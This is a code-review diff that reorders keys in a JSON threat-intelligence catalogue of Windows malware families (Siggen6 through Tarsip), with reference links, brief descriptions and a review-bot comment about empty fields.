- "value": "Siggen6", - "description": "" + "value": "Siggen6" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", "https://securelist.com/the-silence/83009/", 
"http://www.intezer.com/silenceofthemoles/", "https://www.group-ib.com/resources/threat-research/silence.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", - "value": "Silence", - "description": "" + "value": "Silence" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html", "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", - "value": "Silon", - "description": "" + "value": "Silon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "774fcb67-1eeb-4bda-9b36-b624b632417a", - "value": "Siluhdur", - "description": "" + "value": "Siluhdur" }, { + "description": "", "meta": { - "synonyms": [ - "iBank" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", "https://secrary.com/ReversingMalware/iBank/" - ] + ], + "synonyms": [ + "iBank" + ], + "type": [] }, "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", - "value": "Simda", - "description": "" + "value": "Simda" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", + "https://en.wikipedia.org/wiki/Torpig", + "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", + "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", + "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan" + ], "synonyms": [ "Theola", "Quarian", 
@@ -13048,107 +13059,96 @@ "Anserin", "Torpig" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", - "https://en.wikipedia.org/wiki/Torpig", - "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", - "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", - "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan" - ] + "type": [] }, "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", - "value": "Sinowal", - "description": "" + "value": "Sinowal" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", - "value": "Sisfader", - "description": "" + "value": "Sisfader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", "http://malware-traffic-analysis.net/2017/11/23/index.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", - "value": "Skarab Ransom", - "description": "" + "value": "Skarab Ransom" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", - "value": "Skyplex", - "description": "" + "value": "Skyplex" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave", "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" - ] + ], + "synonyms": [], + 
"type": [] }, "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", - "value": "Slave", - "description": "" + "value": "Slave" }, { + "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", "https://securelist.com/apt-slingshot/84312/", "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", - "value": "Slingshot", - "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer" + "value": "Slingshot" }, { + "description": "", "meta": { - "synonyms": [ - "speccom" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" - ] + ], + "synonyms": [ + "speccom" + ], + "type": [] }, "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", - "value": "smac", - "description": "" + "value": "smac" }, { + "description": "The SmokeLoader family is a generic backdoor with a range of 
capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.", "meta": { - "synonyms": [ - "Dofoil" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", 
@@ -13163,218 +13163,220 @@ "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", "https://www.cert.pl/en/news/single/dissecting-smoke-loader/" - ] + ], + "synonyms": [ + "Dofoil" + ], + "type": [] }, "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", - "value": "SmokeLoader", - "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body." + "value": "SmokeLoader" }, { + "description": "", "meta": { - "synonyms": [ - "Ismo" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" - ] + ], + "synonyms": [ + "Ismo" + ], + "type": [] }, "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", - "value": "Smominru", - "description": "" + "value": "Smominru" }, { + "description": "A downloader trojan with some infostealer capabilities focused on the browser. 
Previously observed as part of RigEK campaigns.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/", "https://twitter.com/VK_Intel/status/898549340121288704", "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", - "value": "SnatchLoader", - "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns." + "value": "SnatchLoader" }, { + "description": "", "meta": { - "synonyms": [ - "ByeByeShell" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" - ] + ], + "synonyms": [ + "ByeByeShell" + ], + "type": [] }, "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", - "value": "SNEEPY", - "description": "" + "value": "SNEEPY" }, { + "description": "", "meta": { - "synonyms": [ - "Ursnif" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" - ] + ], + "synonyms": [ + "Ursnif" + ], + "type": [] }, "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", - "value": "Snifula", - "description": "" + "value": "Snifula" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan", "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", - "value": "Snojan", - "description": "" + "value": "Snojan" }, { + 
"description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", - "value": "SNS Locker", - "description": "" + "value": "SNS Locker" }, { + "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", - "value": "Sobaken", - "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT." + "value": "Sobaken" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", - "value": "Socks5 Systemz", - "description": "" + "value": "Socks5 Systemz" }, { + "description": "", "meta": { - "synonyms": [ - "BIRDDOG", - "Nadrac" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" - ] + ], + "synonyms": [ + "BIRDDOG", + "Nadrac" + ], + "type": [] }, "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", - "value": "SocksBot", - "description": "" + "value": "SocksBot" }, { + "description": "", "meta": { - "synonyms": [ - "Napolar" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", 
"https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" - ] + ], + "synonyms": [ + "Napolar" + ], + "type": [] }, "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", - "value": "Solarbot", - "description": "" + "value": "Solarbot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", - "value": "soraya", - "description": "" + "value": "soraya" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bc135ba5-637b-46c9-94fc-2eef5e018bb5", - "value": "Sorgu", - "description": "" + "value": "Sorgu" }, { + "description": "", "meta": { - "synonyms": [ - "denis" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", "https://attack.mitre.org/wiki/Software/S0157", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" - ] + ], + "synonyms": [ + "denis" + ], + "type": [] }, "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", - "value": "SOUNDBITE", - "description": "" + "value": "SOUNDBITE" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", - "value": "Spedear", - 
"description": "" + "value": "Spedear" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", "http://malware-traffic-analysis.net/2017/01/17/index2.html", 
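Review bot: The new side keeps `"description": ""` for Smominru, SNEEPY, Snifula, Snojan, SNS Locker, Socks5 Systemz and most other entries in this hunk, and likewise `"synonyms": []` / `"type": []` wherever nothing is known, so a consumer cannot tell "no description recorded" from "described as empty". Since every entry is already being rewritten here to normalize key order, this is the natural place to decide the policy once: drop the empty keys, or keep them on purpose. If the galaxy's schema or validation script requires these keys to be present (I cannot tell from this hunk), a one-line remark in the commit message to that effect would spare the next reviewer the same question. The same pattern continues in the following hunks, so this is raised once here.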
@@ -13383,573 +13385,571 @@ "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", - "value": "Spora", - "description": "" + "value": "Spora" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "34e9d701-22a1-4315-891d-443edd077abf", - "value": "SpyBot", - "description": "" + "value": "SpyBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "", - "value": "", - "description": "" + "value": "" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", - "value": "SquirtDanger", - "description": "" + "value": "SquirtDanger" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "009db412-762d-4256-8df9-eb213be01ffd", - "value": "SslMM", - "description": "" + "value": "SslMM" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq", "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", - "value": "Stabuniq", - "description": "" + "value": "Stabuniq" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo", "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", - "value": "Stampedo", - "description": "" + "value": "Stampedo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft", "https://securelist.com/operation-daybreak/75100/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", - "value": "StarCruft", - "description": "" + "value": "StarCruft" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader", "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a", - "value": "StarLoader", - "description": "" + "value": "StarLoader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", - "value": "StarsyPound", - "description": "" + 
"value": "StarsyPound" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader", "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "aea21616-061d-4177-9512-8887853394ed", - "value": "StegoLoader", - "description": "" + "value": "StegoLoader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", - "value": "Stinger", - "description": "" + "value": "Stinger" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", - "value": "Stration", - "description": "" + "value": "Stration" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/", "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", - "value": "Stresspaint", - "description": "" + "value": "Stresspaint" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", 
"https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", "https://twitter.com/physicaldrive0/status/786293008278970368", "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", - "value": "StrongPity", - "description": "" + "value": "StrongPity" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", - "value": "Stuxnet", - "description": "" + "value": "Stuxnet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", - "value": "SunOrcal", - "description": "" + "value": "SunOrcal" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", - "value": "SuppoBox", - "description": "" + "value": "SuppoBox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 
"8420653b-1412-45a1-9a2d-6aa9b9eaf906", - "value": "Swift?", - "description": "" + "value": "Swift?" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", - "value": "Sword", - "description": "" + "value": "Sword" }, { + "description": "", "meta": { - "synonyms": [ - "getkys" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", "https://www.symantec.com/connect/blogs/sykipot-attacks", "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", "https://community.rsa.com/thread/185437" - ] + ], + "synonyms": [ + "getkys" + ], + "type": [] }, "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", - "value": "sykipot", - "description": "" + "value": "sykipot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", - "value": "SynAck", - "description": "" + "value": "SynAck" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt", "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", - "value": "SyncCrypt", - "description": "" + "value": "SyncCrypt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], 
"refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", - "value": "SynFlooder", - "description": "" + "value": "SynFlooder" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", - "value": "Synth Loader", - "description": "" + "value": "Synth Loader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", - "value": "Sys10", - "description": "" + "value": "Sys10" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/", "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", - "value": "Syscon", - "description": "" + "value": "Syscon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 
"a4b9c526-42d0-4de9-ab8e-e78f99655d11", - "value": "SysGet", - "description": "" + "value": "SysGet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", - "value": "SysScan", - "description": "" + "value": "SysScan" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", "https://www.secureworks.com/research/srizbi", "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", - "value": "Szribi", - "description": "" + "value": "Szribi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", - "value": "TabMsgSQL", - "description": "" + "value": "TabMsgSQL" }, { + "description": "", "meta": { - "synonyms": [ - "simbot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" - ] + ], + "synonyms": [ + "simbot" + ], + "type": [] }, "uuid": "94323b32-9566-450b-8480-5f9f53b57948", - "value": "taidoor", - "description": "" + "value": "taidoor" }, { + "description": "", "meta": { - 
"synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b0467c03-824f-4071-8668-f056110d2a50", - "value": "Taleret", - "description": "" + "value": "Taleret" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "88ff523e-206b-4918-8c93-e2829427eef2", - "value": "Tandfuy", - "description": "" + "value": "Tandfuy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux", "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410", - "value": "Tapaoux", - "description": "" + "value": "Tapaoux" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", - "value": "Tarsip", - "description": "" + "value": "Tarsip" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 